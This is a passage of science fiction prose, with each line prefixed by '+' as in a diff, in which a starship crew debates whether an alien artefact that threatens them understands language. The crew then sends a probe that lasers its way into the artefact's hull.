+"Cultural exchange," Rorschach said. "That works for me."
+Bates's brow furrowed. "Is that wise?"
+"If it's not inclined to give information, maybe it would rather get some. And we could learn a great deal from the kind of questions it asks."
+"But—"
+"Tell us about home," Rorschach said.
+Sascha resurfaced just long enough to say "Relax, Major. Nobody said we had to give it the right answers."
+The stain on the Gang's topology had flickered when Michelle took over, but it hadn't disappeared. It grew slightly as Michelle described some hypothetical home town in careful terms that mentioned no object smaller than a meter across. (ConSensus confirmed my guess: the hypothetical limit of Firefly eyesight.) When Cruncher took a rare turn at the helm—
+"We don't all of us have parents or cousins. Some never did. Some come from vats."
+"I see. That's sad. Vats sounds so dehumanising."
+—the stain darkened and spread across his surface like an oil slick.
+"Takes too much on faith," Susan said a few moments later.
+By the time Sascha had cycled back into Michelle it was more than doubt, stronger than suspicion; it had become an insight, a dark little meme infecting each of that body's minds in turn. The Gang was on the trail of something. They still weren't sure what.
+I was.
+"Tell me more about your cousins," Rorschach sent.
+"Our cousins lie about the family tree," Sascha replied, "with nieces and nephews and Neandertals. We do not like annoying cousins."
+"We'd like to know about this tree."
+Sascha muted the channel and gave us a look that said Could it be any more obvious? "It couldn't have parsed that. There were three linguistic ambiguities in there. It just ignored them."
+"Well, it asked for clarification," Bates pointed out.
+"It asked a follow-up question. Different thing entirely."
+Bates was still out of the loop. Szpindel was starting to get it, though.. .
+Subtle motion drew my eye. Sarasti was back, floating above the bright topography on the table. The light show squirmed across his visor as he moved his head. I could feel his eyes behind it.
+And something else, behind him.
+I couldn't tell what it was. I could point to nothing but a vague sense of something out of place, somewhere in the background. Something over on the far side of the drum wasn't quite right. No, that wasn't it; something nearer, something amiss somewhere along the drum's axis. But there was nothing there, nothing I could see—just the naked pipes and conduits of the spinal bundle, threading through empty space, and—
+And suddenly, whatever had been wrong was right again. That was what finally locked my focus: the evaporation of some anomaly, a reversion to normalcy that caught my eye like a flicker of motion. I could see the exact spot along the bundle where the change had occured. There was nothing out of place there now—but there had been. It was in my head, barely subliminal, an itch so close to the surface that I knew I could bring it back if I just concentrated.
+Sascha was talking to some alien artefact at the end of a laser beam. She was going on about familial relationships, both evolutionary and domestic: Neandertal and Cro Magnon and mother's cousins twice removed. She'd been doing it for hours now and she had hours yet to go but right now her chatter was distracting me. I tried to block her out and concentrate on the half-perceived image teasing my memory. I'd seen something there, just a moment ago. One of the conduits had had—yes, too many joints on one of the pipes. Something that should have been straight and smooth but was somehow articulated instead. But not one of the pipes, I remembered: an extra pipe, an extra something anyway, something—
+Boney.
+That was crazy. There was nothing there. We were half a light year from home talking to unseen aliens about family reunions, and my eyes were playing tricks on me.
+Have to talk to Szpindel about that, if it happened again.
+
+*
+
+A lull in the background chatter brought me back. Sascha had stopped talking. Darkened facets hung around her like a thundercloud. I pulled back the last thing she had sent: "We usually find our nephews with telescopes. They are hard as Hobblinites."
+More calculated ambiguity. And Hobblinites wasn't even a word.
+Imminent decisions reflected in her eyes. Sascha was poised at the edge of a precipice, gauging the depth of dark waters below.
+"You haven't mentioned your father at all," Rorschach remarked.
+"That's true, Rorschach," Sascha admitted softly, taking a breath—
+And stepping forward.
+"So why don't you just suck my big fat hairy dick?"
+The drum fell instantly silent. Bates and Szpindel stared, open-mouthed. Sascha killed the channel and turned to face us, grinning so widely I thought the top of her head would fall off.
+"Sascha," Bates breathed. "Are you crazy?"
+"So what if I am? Doesn't matter to that thing. It doesn't have a clue what I'm saying."
+"What?"
+"It doesn't even have a clue what it's saying back," she added.
+"Wait a minute. You said—Susan said they weren't parrots. They knew the rules."
+And there Susan was, melting to the fore: "I did, and they do. But pattern-matching doesn't equal comprehension."
+Bates shook her head. "You're saying whatever we're talking to—it's not even intelligent?"
+"Oh, it could be intelligent, certainly. But we're not talking to it in any meaningful sense."
+"So what is it? Voicemail?"
+"Actually," Szpindel said slowly, "I think they call it a Chinese Room..."
+About bloody time, I thought.
+
+*
+
+I knew all about Chinese Rooms. I was one. I didn't even keep it a secret, I told anyone who was interested enough to ask.
+In hindsight, sometimes that was a mistake.
+"How can you possibly tell the rest of us what your bleeding edge is up to if you don't understand it yourself?" Chelsea demanded back when things were good between us. Before she got to know me.
+I shrugged. "It's not my job to understand them. If I could, they wouldn't be very bleeding-edge in the first place. I'm just a, you know, a conduit."
+"Yeah, but how can you translate something if you don't understand it?"
+A common cry, outside the field. People simply can't accept that patterns carry their own intelligence, quite apart from the semantic content that clings to their surfaces; if you manipulate the topology correctly, that content just—comes along for the ride.
+"You ever hear of the Chinese Room?" I asked.
+She shook her head. "Only vaguely. Really old, right?"
+"Hundred years at least. It's a fallacy really, it's an argument that supposedly puts the lie to Turing tests. You stick some guy in a closed room. Sheets with strange squiggles come in through a slot in the wall. He's got access to this huge database of squiggles just like it, and a bunch of rules to tell him how to put those squiggles together."
+"Grammar," Chelsea said. "Syntax."
+I nodded. "The point is, though, he doesn't have any idea what the squiggles are, or what information they might contain. He only knows that when he encounters squiggle delta, say, he's supposed to extract the fifth and sixth squiggles from file theta and put them together with another squiggle from gamma. So he builds this response string, puts it on the sheet, slides it back out the slot and takes a nap until the next iteration. Repeat until the remains of the horse are well and thoroughly beaten."
+"So he's carrying on a conversation," Chelsea said. "In Chinese, I assume, or they would have called it the Spanish Inquisition."
+"Exactly. Point being you can use basic pattern-matching algorithms to participate in a conversation without having any idea what you're saying. Depending on how good your rules are, you can pass a Turing test. You can be a wit and raconteur in a language you don't even speak."
+"That's synthesis?"
+"Only the part that involves downscaling semiotic protocols. And only in principle. And I'm actually getting my input in Cantonese and replying in German, because I'm more of a conduit than a conversant. But you get the idea."
+"How do you keep all the rules and protocols straight? There must be millions of them."
+"It's like anything else. Once you learn the rules, you do it unconsciously. Like riding a bike, or pinging the noosphere. You don't actively think about the protocols at all, you just—imagine how your targets behave."
+"Mmm." A subtle half-smile played at the corner of her mouth. "But—the argument's not really a fallacy then, is it? It's spot-on: you really don't understand Cantonese or German."
+"The system understands. The whole Room, with all its parts. The guy who does the scribbling is just one component. You wouldn't expect a single neuron in your head to understand English, would you?"
+"Sometimes one's all I can spare." Chelsea shook her head. She wasn't going to let it go. I could see her sorting questions in order of priority; I could see them getting increasingly—personal…
+"To get back to the matter at hand," I said, preempting them all, "you were going to show me how to do that thing with the fingers…"
+A wicked grin wiped the questions right off her face. "Oooh, that's right…"
+It's risky, getting involved. Too many confounds. Every tool in the shed goes dull and rusty the moment you get entangled with the system you're observing.
+Still serviceable in a pinch, though.
+
+*
+
+"It hides now," Sarasti said. "It's vulnerable now.
+"Now we go in."
+It wasn't news so much as review: we'd been straight-lining towards Ben for days now. But perhaps the Chinese Room Hypothesis had strengthened his resolve. At any rate, with Rorschach in eclipse once more, we prepared to take intrusiveness to the next level.
+Theseus was perpetually gravid; a generic probe incubated in her fabrication plant, its development arrested just short of birth in anticipation of unforeseen mission requirements. Sometime between briefings the Captain had brought it to parturition, customized for close contact and ground work. It burned down the well at high gee a good ten hours before Rorschach's next scheduled appearance, inserted itself into the rock stream, and went to sleep. If our calculations were in order, it would not be smashed by some errant piece of debris before it woke up again. If all went well, an intelligence that had precisely orchestrated a cast of millions would not notice one extra dancer on the floor. If we were just plain lucky, the myriad high-divers that happened to be line-of-sight at the time were not programmed as tattletales.
+Acceptable risks. If we hadn't been up for them, we might as well have stayed home.
+And so we waited: four optimized hybrids somewhere past the threshold of mere humanity, one extinct predator who'd opted to command us instead of eating us alive. We waited for Rorschach to come back around the bend. The probe fell smoothly around the well, an ambassador to the unwilling—or, if the Gang was right, maybe just a back-door artist set to B&E an empty condo. Szpindel had named it Jack-in-the-box, after some antique child's toy that didn't even rate a listing in ConSensus; we fell in its wake, nearly ballistic now, momentum and inertia carefully precalculated to thread us through the chaotic minefield of Ben's accretion belt.
+Kepler couldn't do it all, though; Theseus grumbled briefly now and then, the intermittent firing of her attitude jets rumbling softly up the spine as the Captain tweaked our descent into the Maelstrom.
+No plan ever survives contact with the enemy I remembered, but I didn't know from where.
+"Got it," Bates said. A speck appeared at Ben's edge; the display zoomed instantly to closeup. "Proximity boot."
+Rorschach remained invisible to Theseus, close as we were, close as we were coming. But parallax stripped at least some of the scales from the probe's eyes; it woke to spikes and spirals of smoky glass flickering in and out of view, Ben's flat endless horizon semivisible through the intervening translucence. The view trembled; waveforms rippled across ConSensus.
+"Quite the magnetic field," Szpindel remarked.
+"Braking," Bates reported. Jack turned smoothly retrograde and fired its torch. On Tactical, delta-vee swung to red.
+Sascha was driving the Gang's body this shift. "Incoming signal," she reported. "Same format."
+Sarasti clicked. "Pipe it."
+"Rorschach to Theseus. Hello again, Theseus." The voice was female this time, and middle-aged.
+Sascha grinned "See? She's not offended at all. Big hairy dick notwithstanding."
+"Don't answer," Sarasti said.
+"Burn complete," Bates reported.
+Coasting now, Jack—sneezed. Silver chaff shot into the void towards the target: millions of compass needles, brilliantly reflective, fast enough to make Theseus seem slow. They were gone in an instant. The probe watched them flee, swept laser eyes across every degree of arc, scanned its sky twice a second and took careful note of each and every reflective flash. Only at first did those needles shoot along anything approaching a straight line: then they swept abruptly into Lorentz spirals, twisted into sudden arcs and corkscrews, shot away along new and intricate trajectories bordering on the relativistic. The contours of Rorschach's magnetic field resolved in ConSensus, at first glance like the nested layers of a glass onion.
+"Sproinnnng," Szpindel said.
+At second glance the onion grew wormy. Invaginations appeared, long snaking tunnels of energy proliferating fractally at every scale.
+"Rorschach to Theseus. Hello, Theseus. You there?"
+A holographic inset beside the main display plotted the points of a triangle in flux: Theseus at the apex, Rorschach and Jack defining the narrow base.
+"Rorschach to Theseus. I seeee you...."
+"She's got a more casual affect than he ever did." Sascha glanced up at Sarasti, and did not add You sure about this? She was starting to wonder herself, though. Starting to dwell on the potential consequences of being wrong, now that we were committed. As far as sober second thought was concerned it was too little too late; but for Sascha, that was progress.
+Besides, it had been Sarasti's decision.
+Great hoops were resolving in Rorschach's magnetosphere. Invisible to human eyes, their outlines were vanishingly faint even on Tactical; the chaff had scattered so thinly across the sky that even the Captain was resorting to guesswork. The new macrostructures hovered in the magnetosphere like the nested gimbals of some great phantom gyroscope.
+"I see you haven't changed your vector," Rorschach remarked. "We really wouldn't advise continuing your approach. Seriously. For your own safety."
+Szpindel shook his head. "Hey, Mandy. Rorschach talking to Jack at all?"
+"If it is, I'm not seeing it. No incident light, no directed EM of any kind." She smiled grimly. "Seems to have snuck in under the radar. And don't call me Mandy."
+Theseus groaned, twisting. I staggered in the low pseudograv, reached out to steady myself. "Course correction," Bates reported. "Unplotted rock."
+"Rorschach to Theseus. Please respond. Your current heading is unacceptable, repeat, your current heading is unacceptable. Strongly advise you change course."
+By now the probe coasted just a few kilometers off Rorschach's leading edge. That close it served up way more than magnetic fields: it presented Rorschach itself in bright, tactical color codes. Invisible curves and spikes iridesced in ConSensus across any number of on-demand pigment schemes: gravity, reflectivity, blackbody emissions. Massive electrical bolts erupting from the tips of thorns rendered in lemon pastels. User-friendly graphics had turned Rorschach into a cartoon.
+"Rorschach to Theseus. Please respond."
+Theseus growled to stern, fishtailing. On tactical, another just-plotted piece of debris swept by a discreet six thousand meters to port.
+"Rorschach to Theseus. If you are unable to respond, please—holy shit!"
+The cartoon flickered and died.
+I'd seen what had happened in that last instant, though: Jack passing near one of those great phantom hoops; a tongue of energy flicking out, quick as a frog's; a dead feed.
+"I see what you're up to now, you cocksuckers. Do you think we're fucking blind down here?"
+Sascha clenched her teeth. "We—"
+"No," Sarasti said.
+"But it fi—"
+Sarasti hissed, from somewhere in the back of his throat. I had never heard a mammal make a noise quite like that before. Sascha fell immediately silent.
+Bates negotiated with her controls. "I've still got—just a sec—"
+"You pull that thing back right fucking now, you hear us? Right fucking now."
+"Got it." Bates gritted as the feed came back up. "Just had to reacquire the laser." The probe had been kicked wildly off-course—as if someone fording a river had been caught in sudden undertow and thrown over a waterfall—but it was still talking, and still mobile.
+Barely. Bates struggled to stay the course. Jack staggered and wobbled uncontrollably though the tightly-wound folds of Rorschach's magnetosphere. The artefact loomed huge in its eye. The feed strobed.
+"Maintain approach," Sarasti said calmly.
+"Love to," Bates gritted. "Trying."
+Theseus skidded again, corkscrewing. I could have sworn I heard the bearings in the drum grind for a moment. Another rock sailed past on Tactical.
+"I thought you'd plotted those things," Szpindel grumbled.
+"You want to start a war, Theseus? Is that what you're trying to do? You think you're up for it?"
+"It doesn't attack," Sarasti said.
+"Maybe it does." Bates kept her voice low; I could see the effort it took. "If Rorschach can control the trajectories of these—"
+"Normal distribution. Insignificant corrections." He must have meant statistically: the torque and grind of the ship's hull felt pretty significant to the others.
+"Oh, right," Rorschach said suddenly. "We get it now. You don't think there's anyone here, do you? You've got some high-priced consultant telling you there's nothing to worry about."
+Jack was deep in the forest. We'd lost most of the tactical overlays to reduced baud. In dim visible light Rorschach's great ridged spines, each the size of a skyscraper, hashed a nightmare view on all sides. The feed stuttered as Bates struggled to keep the beam aligned. ConSensus painted walls and airspace with arcane telemetry. I had no idea what any of it meant.
+"You think we're nothing but a Chinese Room," Rorschach sneered.
+Jack stumbled towards collision, grasping for something to hang on to.
+"Your mistake, Theseus."
+It hit something. It stuck.
+And suddenly Rorschach snapped into view—no refractory composites, no profiles or simulations in false color. There it was at last, naked even to Human eyes.
+Imagine a crown of thorns, twisted, dark and unreflective, grown too thickly tangled to ever rest on any human head. Put it in orbit around a failed star whose own reflected half-light does little more than throw its satellites into silhouette. Occasional bloody highlights glinted like dim embers from its twists and crannies; they only emphasized the darkness everywhere else.
+Imagine an artefact that embodies the very notion of torture, something so wrenched and disfigured that even across uncounted lightyears and unimaginable differences in biology and outlook, you can't help but feel that somehow, the structure itself is in pain.
+Now make it the size of a city.
+It flickered as we watched. Lightning arced from recurved spines a thousand meters long. ConSensus showed us a strobe-lit hellscape, huge and dark and twisted. The composites had lied. It was not the least bit beautiful.
+"Now it's too late," something said from deep inside. "Now every last one of you is dead. And Susan? You there, Susan?
+"We're taking you first."
+"Life's too short for chess."
+— Byron
+
+They never sealed the hatch behind them. It was too easy to get lost up there in the dome, naked infinite space stretching a hundred eighty degrees on every axis. They needed all that emptiness but they needed an anchor in its midst: soft stray light from astern, a gentle draft from the drum, the sounds of people and machinery close by. They needed to have it both ways.
+I lay in wait. Reading a dozen blatant cues in their behavior, I was already squirreled away in the forward airlock when they passed. I gave them a few minutes and crept forward to the darkened bridge.
+"Of course they called her by name," Szpindel was saying. "That was the only name they had. She told them, remember?"
+"Yes." Michelle didn't seem reassured.
+"Hey, it was you guys said we were talking to a Chinese Room. You saying you were wrong?"
+"We—no. Of course not."
+"Then it wasn't really threatening Suze at all, was it? It wasn't threatening any of us. It had no idea what it was saying."
+"It's rule-based, Isaac. It was following some kind of flowchart it drew up by observing Human languages in action. And somehow those rules told it to respond with threats of violence."
+"But if it doesn't even know what it was saying—"
+"It doesn't. It can't. We parsed the phrasing nineteen different ways, tried out conceptual units of every different length..." A long, deep breath. "But it attacked the probe, Isaac."
+"Jack just got too close to one of those electrode thingies is all. It just arced."
+"So you don't think Rorschach is hostile?"
+Long silence—long enough to make me wonder if I'd been detected.
+"Hostile," Szpindel said at last. "Friendly. We learned those words for life on Earth, eh? I don't know if they even apply out here." His lips smacked faintly. "But I think it might be something like hostile."
+Michelle sighed. "Isaac, there's no reason for—I mean, it just doesn't make sense that it would be. We can't have anything it wants."
+"It says it wants to be left alone," Szpindel said. "Even if it doesn't mean it."
+They floated quietly for a while, up there past the bulkhead.
+"At least the shielding held," Szpindel said finally. "That's something." He wasn't just talking about Jack; our own carapace was coated with the same stuff now. It had depleted our substrate stockpiles by two thirds, but no one wanted to rely on the ship's usual magnetics in the face of anything that could play so easily with the electromagnetic spectrum.
+"If they attack us, what do we do?" Michelle said.
+"Learn what we can, while we can. Fight back. While we can."
+"If we can. Look out there, Isaac. I don't care how embryonic that thing is. Tell me we're not hopelessly outmatched."
+"Outmatched, for sure. Hopelessly, never."
+"That's not what you said before."
+"Still. There's always a way to win."
+"If I said that, you'd call it wishful thinking."
+"If you said that, it would be. But I'm saying it, so it's game theory."
+"Game theory again. Jesus, Isaac."
+"No, listen. You're thinking about the aliens like they were some kind of mammal. Something that cares, something that looks after its investments."
+"How do you know they aren't?"
+"Because you can't protect your kids when they're lightyears away. They're on their own, and it's a big cold dangerous universe so most of them aren't going to make it, eh? The most you can do is crank out millions of kids, take cold comfort in knowing that a few always luck out through random chance. It's not a mammal mind-set, Meesh. You want an earthbound simile, think of dandelion seeds. Or, or herring."
+A soft sigh. "So they're interstellar herring. That hardly means they can't crush us."
+"But they don't know about us, not in advance. Dandelion seed doesn't know what it's up against before it sprouts. Maybe nothing. Maybe some spastic weed that goes over like straw in the wind. Or maybe something that kicks its ass halfway to the Magellanic Clouds. It doesn't know, and there's no such thing as a one-size-fits-all survival strategy. Something that aces against one player blows goats against a different one. So the best you can do is mix up your strategies based on the odds. It's a weighted dice roll and it gives you the best mean payoff over the whole game, but you're bound to crap out and choose the wrong strategy at least some of the time. Price of doing business. And that means—that means—that weak players not only can win against stronger ones, but they're statistically bound to in some cases."
+Michelle snorted. "That's your game theory? Rock Paper Scissors with statistics?"
+Maybe Szpindel didn't know the reference. He didn't speak, long enough to call up a subtitle; then he brayed like a horse. "Rock Paper Scissors! Yes!"
+Michelle digested that for a moment. "You're sweet for trying, but that only works if the other side is just blindly playing the odds, and they don't have to do that if they know who they're going up against in advance. And my dear, they have so very much information about us..."
+They'd threatened Susan. By name.
+"They don't know everything," Szpindel insisted. "And the principle works for any scenario involving incomplete information, not just the ignorant extreme."
+"Not as well."
+"But some, and that gives us a chance. Doesn't matter how good you are at poker when it comes to the deal, eh? Cards still deal out with the same odds."
+"So that's what we're playing. Poker."
+"Be thankful it's not chess. We wouldn't have a hope in hell."
+"Hey. I'm supposed to be the optimist in this relationship."
+"You are. I'm just fatalistically cheerful. We all come into the story halfway through, we all catch up as best we can, and we're all gonna die before it ends."
+"That's my Isaac. Master of the no-win scenario."
+"You can win. Winner's the guy who makes the best guess on how it all comes out."
+"So you are just guessing."
+"Yup. And you can't make an informed guess without data, eh? And we could be the very first to find out what's gonna happen to the whole Human race. I'd say that puts us into the semifinals, easy."
+Michelle didn't answer for a very long time. When she did, I couldn't hear her words.
+Neither could Szpindel: "Sorry?"
+"Covert to invulnerable, you said. Remember?"
+"Uh huh. Rorschach's Graduation Day. "
+"How soon, do you think?"
+"No idea. But I don't think it's the kind of thing that's gonna slip by unnoticed. And that's why I don't think it attacked us."
+She must have looked a question.
+"Because when it does, it won't be some debatable candy-ass bitch slap," he told her. "When that fucker rises up, we're gonna know."
+A sudden flicker from behind. I spun in the cramped passageway and bit down on a cry: something squirmed out of sight around the corner, something with arms, barely glimpsed, gone in an instant.
+Never there. Couldn't be there. Impossible.
+"Did you hear that?" Szpindel asked, but I'd fled to stern before Michelle could answer him.
+
+*
+
+We'd fallen so far that the naked eye didn't see a disk, barely even saw curvature any more. We were falling towards a wall, a vast roiling expanse of dark thunderclouds that extended in all directions to some new, infinitely-distant horizon. Ben filled half the universe.
+And still we fell.
+Far below, Jack clung to Rorschach's ridged surface with bristly gecko-feet fenders and set up camp. It sent x-rays and ultrasound into the ground, tapped enquiring fingers and listened to the echos, planted tiny explosive charges and measured the resonance of their detonations. It shed seeds like pollen: tiny probes and sensors by the thousands, self-powered, near-sighted, stupid and expendable. The vast majority were sacrificial offerings to random chance; only one in a hundred lasted long enough to return usable telemetry.
+While our advance scout took measure of its local neighborhood, Theseus drew larger-scale birdseye maps from the closing sky. It spat out thousands of its own disposable probes, spread them across the heavens and collected stereoscopic data from a thousand simultaneous perspectives.
+Patchwork insights assembled in the drum. Rorschach's skin was sixty percent superconducting carbon nanotube. Rorschach's guts were largely hollow; at least some of those hollows appeared to contain an atmosphere. No earthly form of life would have lasted a second in there, though; intricate topographies of radiation and electromagnetic force seethed around the structure, seethed within it. In some places the radiation was intense enough to turn unshielded flesh to ash in an instant; calmer backwaters would merely kill in the same span of time. Charged particles raced around invisible racetracks at relativistic speeds, erupting from jagged openings, hugging curves of magnetic force strong enough for neutron stars, arcing through open space and plunging back into black mass. Occasional protuberances swelled and burst and released clouds of microparticulates, seeding the radiation belts like spores. Rorschach resembled nothing so much as a nest of half-naked cyclotrons, tangled one with another.
+Neither Jack below nor Theseus above could find any points of entry, beyond those impassable gaps that spat out streams of charged particles or swallowed them back down. No airlocks or hatches or viewports resolved with increasing proximity. The fact that we'd been threatened via laser beam implied some kind of optical antennae or tightcast array; we weren't even able to find that much.
+A central hallmark of von Neumann machines was self-replication. Whether Rorschach would meet that criterion—whether it would germinate, or divide, or give birth when it passed some critical threshold—whether it had done so already—remained an open question.
+One of a thousand. At the end of it all—after all the measurements, the theorizing and deduction and outright guesswork—we settled into orbit with a million trivial details and no answers. In terms of the big questions, there was only one thing we knew for sure.
+So far, Rorschach was holding its fire.
+
+*
+
+"It sounded to me like it knew what it was saying," I remarked.
+"I guess that's the whole point," Bates said. She had no one to confide in, partook of no intimate dialogs that could be overheard. With her, I used the direct approach.
+Theseus was birthing a litter, two by two. They were nasty-looking things, armored, squashed egg-shapes, twice the size of a human torso and studded with gardening implements: antennae, optical ports, retractable threadsaws. Weapons muzzles.
+Bates was summoning her troops. We floated before the primary fab port at the base of Theseus' spine. The plant could just as easily have disgorged the grunts directly into the hold beneath the carapace—that was where they'd be stored anyway, until called upon—but Bates was giving each a visual inspection before sending it through one of the airlocks a few meters up the passageway. Ritual, perhaps. Military tradition. Certainly there was nothing she could see with her eyes that wouldn't be glaringly obvious to the most basic diagnostic.
+"Would it be a problem?" I asked. "Running them without your interface?"
+"Run themselves just fine. Response time actually improves without spam in the network. I'm more of a safety precaution."
+Theseus growled, giving us more attitude. The plating trembled to stern; another piece of local debris, no longer in our path. We were angling towards an equatorial orbit just a few miniscule kilometers above the artefact; insanely, the approach curved right through the accretion belt.
+It didn't bother the others. "Like surviving traffic in a high speed lane," Sascha had said, disdainful of my misgivings. "Try creeping across and you're road kill. Gotta speed up, go with the flow." But the flow was turbulent; we hadn't gone five minutes without a course correction since Rorschach had stopped talking to us.
+"So, do you buy it?" I asked. "Pattern-matching, empty threats? Nothing to worry about?"
+"Nobody's fired on us yet," she said. Meaning: Not for a second.
+"What's your take on Susan's argument? Different niches, no reason for conflict?"
+"Makes sense, I guess." Utter bullshit.
+"Can you think of any reason why something with such different needs would attack us?"
+"That depends," she said, "on whether the fact that we are different is reason enough."
+I saw playground battlefields reflected in her topology. I remembered my own, and wondered if there were any other kind.
+Then again, that only proved the point. Humans didn't really fight over skin tone or ideology; those were just handy cues for kin-selection purposes. Ultimately it always came down to bloodlines and limited resources.
+"I think Isaac would say this is different," I said.
+"I guess." Bates sent one grunt humming off to the hold; two more emerged in formation, spinelight glinting off their armor.
+"How many of these are you making, anyway?"
+"We're breaking and entering, Siri. Not wise to leave our own house unguarded."
+I inspected her surfaces as she inspected theirs. Doubt and resentment simmered just beneath.
+"You're in a tough spot," I remarked.
+"We all are."
+"But you're responsible for defending us, against something we don't know anything about. We're only guessing that—"
+"Sarasti doesn't guess," Bates said. "The man's in charge for a reason. Doesn't make much sense to question his orders, given we're all about a hundred IQ points short of understanding the answer anyway."
+"And yet he's also got that whole predatory side nobody talks about," I remarked. "It must be difficult for him, all that intellect coexisting with so much instinctive aggression. Making sure the right part wins."
+She wondered in that instant whether Sarasti might be listening in. She decided in the next that it didn't matter: why should he care what the cattle thought, as long as they did what they were told?
+All she said was, "I thought you jargonauts weren't supposed to have opinions."
+"That wasn't mine."
+Bates paused. Returned to her inspection.
+"You do know what I do," I said.
+"Uh huh." The first of the current pair passed muster and hummed off up the spine. She turned to the second. "You simplify things. So the folks back home can understand what the specialists are up to."
+"That's part of it."
+"I don't need a translator, Siri. I'm just a consultant, assuming things go well. A bodyguard if they don't."
+"You're an officer and a military expert. I'd say that makes you more than qualified when it comes to assessing Rorschach's threat potential."
+"I'm muscle. Shouldn't you be simplifying Jukka or Isaac?"
+"That's exactly what I'm doing."
+She looked at me.
+"You interact," I said. "Every component of the system affects every other. Processing Sarasti without factoring you in would be like trying to calculate acceleration while ignoring mass."
+She turned back to her brood. Another robot passed muster.
+She didn't hate me. What she hated was what my presence implied.
+They don't trust us to speak for ourselves, she wouldn't say. No matter how qualified we are, no matter how far ahead of the pack. Maybe even because of that. We're contaminated. We're subjective. So they send Siri Keeton to tell them what we really mean.
+"I get it," I said after a moment.
+"Do you."
+"It's not about trust, Major. It's about location. Nobody gets a good view of a system from the inside, no matter who they are. The view's distorted."
+"And yours isn't."
+"I'm outside the system."
+"You're interacting with me now."
+"As an observer only. Perfection's unattainable but it isn't unapproachable, you know? I don't play a role in decision-making or research, I don't interfere in any aspect of the mission that I'm assigned to study. But of course I ask questions. The more information I have, the better my analysis."
+"I thought you didn't have to ask. I thought you guys could just, read the signs or something."
+"Every bit helps. It all goes into the mix."
+"You doing it now? Synthesizing?"
+I nodded.
+"And you do this without any specialized knowledge at all."
+"I'm as much of a specialist as you. I specialize in processing informational topologies."
+"Without understanding their content."
+"Understanding the shapes is enough."
+Bates seemed to find some small imperfection in the battlebot under scrutiny, scratched at its shell with a fingernail. "Software couldn't do that without your help?"
+"Software can do a lot of things. We've chosen to do some for ourselves." I nodded at the grunt. "Your visual inspections, for example."
+She smiled faintly, conceding the point.
+"So I'd encourage you to speak freely. You know I'm sworn to confidentiality."
+"Thanks," she said, meaning On this ship, there's no such thing.
+Theseus chimed. Sarasti spoke in its wake: "Orbital insertion in fifteen minutes. Everyone to the drum in five."
+"Well," Bates said, sending one last grunt on its way. "Here we go." She pushed off and sailed up the spine.
+The newborn killing machines clicked at me. They smelled like new cars.
+"By the way," Bates called over her shoulder, "you missed the obvious one."
+"Sorry?"
+She spun a hundred-eighty degrees at the end of the passageway, landed like an acrobat beside the drum hatch. "The reason. Why something would attack us even if we didn't have anything it wanted."
+I read it off her: "If it wasn't attacking at all. If it was defending itself."
+"You asked about Sarasti. Smart man. Strong Leader. Maybe could spend a little more time with the troops."
+Vampire doesn't respect his command. Doesn't listen to advice. Hides away half the time.
+I remembered transient killer whales. "Maybe he's being considerate." He knows he makes us nervous.
+"I'm sure that's it," Bates said.
+Vampire doesn't trust himself.
+
+*
+
+It wasn't just Sarasti. They all hid from us, even when they had the upper hand. They always stayed just the other side of myth.
+It started pretty much the same way it did for anything else; vampires were far from the first to learn the virtues of energy conservation. Shrews and hummingbirds, saddled with tiny bodies and overclocked metabolic engines, would have starved to death overnight if not for the torpor that overtook them at sundown. Comatose elephant seals lurked breathless at the bottom of the sea, rousing only for passing prey or redline lactate levels. Bears and chipmunks cut costs by sleeping away the impoverished winter months, and lungfish—Devonian black belts in the art of estivation—could curl up and die for years, waiting for the rains.
+With vampires it was a little different. It wasn't shortness of breath, or metabolic overdrive, or some blanket of snow that locked the pantry every winter. The problem wasn't so much a lack of prey as a lack of difference from it; vampires were such a recent split from the ancestral baseline that the reproductive rates hadn't diverged. This was no woodland-variety lynx-hare dynamic, where prey outnumbered predators a hundred to one. Vampires fed on things that bred barely faster than they did. They would have wiped out their own food supply in no time if they hadn't learned how to ease off on the throttle.
+By the time they went extinct they'd learned to shut down for decades.
+It made two kinds of sense. It not only slashed their metabolic needs while prey bred itself back to harvestable levels, it gave us time to forget that we were prey. We were so smart by the Pleistocene, smart enough for easy skepticism; if you haven't seen any night-stalking demons in all your years on the savannah, why should you believe some senile campfire ramblings passed down by your mother's mother?
+It was murder on our ancestors, even if those same enemy genes—co-opted now—served us so well when we left the sun a half-million years later. But it was almost—heartening, I guess—to think that maybe Sarasti felt the tug of other genes, some aversion to prolonged visibility shaped by generations of natural selection. Maybe he spent every moment in our company fighting voices that urged him to hide, hide, let them forget. Maybe he retreated when they got too loud, maybe we made him as uneasy as he made us.
+We could always hope.
+
+*
+
+Our final orbit combined discretion and valor in equal measure.
+Rorschach described a perfect equatorial circle 87,900 km from Big Ben's center of gravity. Sarasti was unwilling to let it out of sight, and you didn't have to be a vampire to mistrust relay sats when swinging through a radiation-soaked blizzard of rock and machinery. The obvious alternative was to match orbits.
+At the same time, all the debate over whether or not Rorschach had meant—or even understood—the threats it had made was a bit beside the point. Counterintrusion measures were a distinct possibility either way, and ongoing proximity only increased the risk. So Sarasti had derived some optimum compromise, a mildly eccentric orbit that nearly brushed the artefact at perigee but kept a discreet distance the rest of the time. It was a longer trajectory than Rorschach's, and higher—we had to burn on the descending arc to keep in synch—but the end result was continuously line-of-sight, and only brought us within striking distance for three hours either side of bottoming out.
+Our striking distance, that is. For all we knew Rorschach could have reached out and swatted us from the sky before we'd even left the solar system.
+Sarasti gave the command from his tent. ConSensus carried his voice into the drum as Theseus coasted to apogee: "Now."
+Jack had erected a tent about itself, a blister glued to Rorschach's hull and blown semi-taut against vacuum with the merest whiff of nitrogen. Now it brought lasers to bear and started digging; if we'd read the vibrations right, the ground should be only thirty-four centimeters deep beneath its feet. The beams stuttered as they cut, despite six millimeters of doped shielding.
+"Son of a bitch," Szpindel murmured. "It's working."
+We burned through tough fibrous epidermis. We burned through veins of insulation that might have been some sort of programmable asbestos. We burned through alternating layers of superconducting mesh, and the strata of flaking carbon separating them.
+We burned through.
+The lasers shut down instantly. Within seconds Rorschach's intestinal gases had blown taut the skin of the tent. Black carbon smoke swirled and danced in sudden thick atmosphere.
+Nothing shot back at us. Nothing reacted. Partial pressures piled up on ConSensus: methane, ammonia, hydrogen. Lots of water vapor, freezing as fast as it registered.
+Szpindel grunted. "Reducing atmosphere. Pre-Snowball." He sounded disappointed.
+"Maybe it's a work in progress," James suggested. "Like the structure itself."
+"Maybe."
